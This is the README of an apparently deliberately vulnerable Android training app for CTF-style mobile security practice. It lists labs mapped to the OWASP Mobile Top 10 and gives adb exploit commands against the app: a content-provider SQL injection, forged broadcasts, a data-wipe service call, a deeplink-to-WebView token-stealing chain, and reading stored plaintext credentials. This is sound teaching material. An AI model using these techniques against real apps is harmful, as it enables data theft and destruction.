
Application Android délibérément vulnérable pour la recherche en sécurité mobile et la pratique du bug bounty - OWASP Mobile Top 10
Une application Android délibérément vulnérable pour la recherche en sécurité mobile, la pratique du bug bounty et l'apprentissage de type CTF. Contient 21 vulnérabilités documentées, mappées sur l'OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
Lancez l'application, parcourez chaque lab, capturez les flags et soumettez-les sur le tableau de score CTF intégré à l'application.
| Catégorie | Vulnérabilités | Flags |
|---|---|---|
| WebView | WV-01 à WV-05 | 5 |
| Deeplink | DL-01 à DL-04, DL-CHAIN | 5 |
| Auth / Injection SQL | SQL-01 | 1 |
| Panneau d'administration | AP-01 à AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 à BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Interception réseau | NET-01 | 1 |
| Banque / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Stockage | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
20 flags au total, plus un flag maître attribué pour les avoir tous capturés.
| Liste des labs | Tableau de score CTF |
|---|---|
| lab |
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Watch for logged secrets
adb logcat | grep Gu3ssWeak
Ce projet est purement éducatif. Toutes les vulnérabilités sont intentionnelles et documentées. Les techniques présentées ici s'appliquent à de vraies applications, mais ne testez que des systèmes que vous possédez ou que vous êtes autorisé à tester. Consultez SECURITY.md pour l'avertissement complet et les conseils de divulgation responsable.
MIT - voir LICENSE.